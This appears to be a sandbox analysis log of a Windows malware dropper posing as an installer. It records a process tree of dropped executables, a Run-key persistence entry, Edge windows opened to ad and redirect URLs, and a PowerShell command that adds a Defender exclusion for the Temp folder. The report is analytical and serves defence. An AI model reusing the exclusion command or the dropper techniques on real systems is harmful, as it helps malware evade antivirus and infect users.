Token: SeTcbPrivilege	4356	installer.exe
Token: SeSecurityPrivilege	4356	installer.exe
Token: SeTakeOwnershipPrivilege	4356	installer.exe
Token: SeLoadDriverPrivilege	4356	installer.exe
Token: SeSystemProfilePrivilege	4356	installer.exe
Token: SeSystemtimePrivilege	4356	installer.exe
Token: SeProfSingleProcessPrivilege	4356	installer.exe
Token: SeIncBasePriorityPrivilege	4356	installer.exe
Token: SeCreatePagefilePrivilege	4356	installer.exe
Token: SeCreatePermanentPrivilege	4356	installer.exe
Token: SeBackupPrivilege	4356	installer.exe
Token: SeRestorePrivilege	4356	installer.exe
Token: SeShutdownPrivilege	4356	installer.exe
Token: SeDebugPrivilege	4356	installer.exe
Token: SeAuditPrivilege	4356	installer.exe
Token: SeSystemEnvironmentPrivilege	4356	installer.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

setup_2.tmpultramediaburner.tmpinstaller.exemsedge.exe

pid process

5536 setup_2.tmp
5336 ultramediaburner.tmp
4356 installer.exe
5768 msedge.exe

pid	process
5536	setup_2.tmp
5336	ultramediaburner.tmp
4356	installer.exe
5768	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exeFri157e25afd971.execmd.exeWerFault.exeWerFault.exeFri157e25afd971.tmpFri1553f0ee90.exeFri155442fc38b.exe

description	pid	process	target process
PID 2340 wrote to memory of 3828	2340	setup_x86_x64_install.exe	setup_installer.exe
PID 2340 wrote to memory of 3828	2340	setup_x86_x64_install.exe	setup_installer.exe
PID 2340 wrote to memory of 3828	2340	setup_x86_x64_install.exe	setup_installer.exe
PID 3828 wrote to memory of 4152	3828	setup_installer.exe	setup_install.exe
PID 3828 wrote to memory of 4152	3828	setup_installer.exe	setup_install.exe
PID 3828 wrote to memory of 4152	3828	setup_installer.exe	setup_install.exe
PID 4152 wrote to memory of 4804	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4804	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4804	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4856	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4856	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4856	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 2140	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 2140	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 2140	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4360	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4360	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4360	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4920	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4920	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4920	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4784	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4784	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4784	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 5060	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 5060	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 5060	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4456	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4456	4152	setup_install.exe	cmd.exe
PID 4152 wrote to memory of 4456	4152	setup_install.exe	cmd.exe
PID 2140 wrote to memory of 3780	2140	cmd.exe	Fri156ec98815f89c.exe
PID 2140 wrote to memory of 3780	2140	cmd.exe	Fri156ec98815f89c.exe
PID 2140 wrote to memory of 3780	2140	cmd.exe	Fri156ec98815f89c.exe
PID 4804 wrote to memory of 476	4804	cmd.exe	powershell.exe
PID 4804 wrote to memory of 476	4804	cmd.exe	powershell.exe
PID 4804 wrote to memory of 476	4804	cmd.exe	powershell.exe
PID 4856 wrote to memory of 2340	4856	cmd.exe	Fri1544861ac3fe6a.exe
PID 4856 wrote to memory of 2340	4856	cmd.exe	Fri1544861ac3fe6a.exe
PID 4856 wrote to memory of 2340	4856	cmd.exe	Fri1544861ac3fe6a.exe
PID 4360 wrote to memory of 3768	4360	cmd.exe	Fri157e25afd971.exe
PID 4360 wrote to memory of 3768	4360	cmd.exe	Fri157e25afd971.exe
PID 4360 wrote to memory of 3768	4360	cmd.exe	Fri157e25afd971.exe
PID 4920 wrote to memory of 3232	4920	cmd.exe	Fri155442fc38b.exe
PID 4920 wrote to memory of 3232	4920	cmd.exe	Fri155442fc38b.exe
PID 4784 wrote to memory of 4188	4784	cmd.exe	Fri15af75ee9b.exe
PID 4784 wrote to memory of 4188	4784	cmd.exe	Fri15af75ee9b.exe
PID 4784 wrote to memory of 4188	4784	cmd.exe	Fri15af75ee9b.exe
PID 3768 wrote to memory of 1124	3768	Fri157e25afd971.exe	Fri157e25afd971.tmp
PID 3768 wrote to memory of 1124	3768	Fri157e25afd971.exe	Fri157e25afd971.tmp
PID 3768 wrote to memory of 1124	3768	Fri157e25afd971.exe	Fri157e25afd971.tmp
PID 4456 wrote to memory of 1164	4456	cmd.exe	Fri1553f0ee90.exe
PID 4456 wrote to memory of 1164	4456	cmd.exe	Fri1553f0ee90.exe
PID 1252 wrote to memory of 2340	1252	WerFault.exe	Fri1544861ac3fe6a.exe
PID 1252 wrote to memory of 2340	1252	WerFault.exe	Fri1544861ac3fe6a.exe
PID 1180 wrote to memory of 4188	1180	WerFault.exe	Fri15af75ee9b.exe
PID 1180 wrote to memory of 4188	1180	WerFault.exe	Fri15af75ee9b.exe
PID 1124 wrote to memory of 3184	1124	Fri157e25afd971.tmp	zab2our.exe
PID 1124 wrote to memory of 3184	1124	Fri157e25afd971.tmp	zab2our.exe
PID 1164 wrote to memory of 3584	1164	Fri1553f0ee90.exe	LzmwAqmV.exe
PID 1164 wrote to memory of 3584	1164	Fri1553f0ee90.exe	LzmwAqmV.exe
PID 1164 wrote to memory of 3584	1164	Fri1553f0ee90.exe	LzmwAqmV.exe
PID 3232 wrote to memory of 3800	3232	Fri155442fc38b.exe	3155661.exe
PID 3232 wrote to memory of 3800	3232	Fri155442fc38b.exe	3155661.exe
PID 3232 wrote to memory of 4860	3232	Fri155442fc38b.exe	5554559.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2340

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3828

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4856

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri1544861ac3fe6a.exe
Fri1544861ac3fe6a.exe
5⤵
- Executes dropped EXE
PID:2340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 280
6⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2140

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri156ec98815f89c.exe
Fri156ec98815f89c.exe
5⤵
- Executes dropped EXE
PID:3780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri157e25afd971.exe
Fri157e25afd971.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3768

C:\Users\Admin\AppData\Local\Temp\is-JTQRM.tmp\Fri157e25afd971.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JTQRM.tmp\Fri157e25afd971.tmp" /SL5="$601F6,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\Fri157e25afd971.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124

C:\Users\Admin\AppData\Local\Temp\is-1EJFG.tmp\zab2our.exe
"C:\Users\Admin\AppData\Local\Temp\is-1EJFG.tmp\zab2our.exe" /S /UID=burnerch2
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:3184

C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe
"C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:420

C:\Users\Admin\AppData\Local\Temp\is-LACPM.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LACPM.tmp\ultramediaburner.tmp" /SL5="$50210,281924,62464,C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5336

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
- Executes dropped EXE
PID:668

C:\Users\Admin\AppData\Local\Temp\a4-df588-779-300b4-a22cd99945b46\Gizhushadugu.exe
"C:\Users\Admin\AppData\Local\Temp\a4-df588-779-300b4-a22cd99945b46\Gizhushadugu.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
- Suspicious use of FindShellTrayWindow
PID:5768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
10⤵
PID:6064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
10⤵
PID:4520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
10⤵
PID:2236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
10⤵
PID:1632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
10⤵
PID:5772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
10⤵
PID:1344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
10⤵
PID:5728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
10⤵
PID:3660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1
10⤵
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:8
10⤵
PID:3504

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:8
10⤵
PID:3096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1860 /prefetch:2
10⤵
PID:10032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
10⤵
PID:10988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
10⤵
PID:12392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
10⤵
PID:12992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
10⤵
PID:10032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
10⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
10⤵
PID:14504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
10⤵
PID:14704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
10⤵
PID:9156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
10⤵
PID:5464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
10⤵
PID:15952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
10⤵
PID:22100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
10⤵
PID:23240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
10⤵
PID:11156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
10⤵
PID:26564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
10⤵
PID:23292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1040 /prefetch:1
10⤵
PID:29980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
10⤵
PID:11448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,15522794795659855686,15907120105591480214,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6844 /prefetch:8
10⤵
PID:31724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
9⤵
PID:13944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
10⤵
PID:14188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
9⤵
PID:16424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
10⤵
PID:10124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
9⤵
PID:15108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
10⤵
PID:8256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
9⤵
PID:33916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864dd46f8,0x7ff864dd4708,0x7ff864dd4718
10⤵
PID:33700

C:\Users\Admin\AppData\Local\Temp\6a-08fd6-7fe-6b992-3f40dd4bd78e8\Xydisagavi.exe
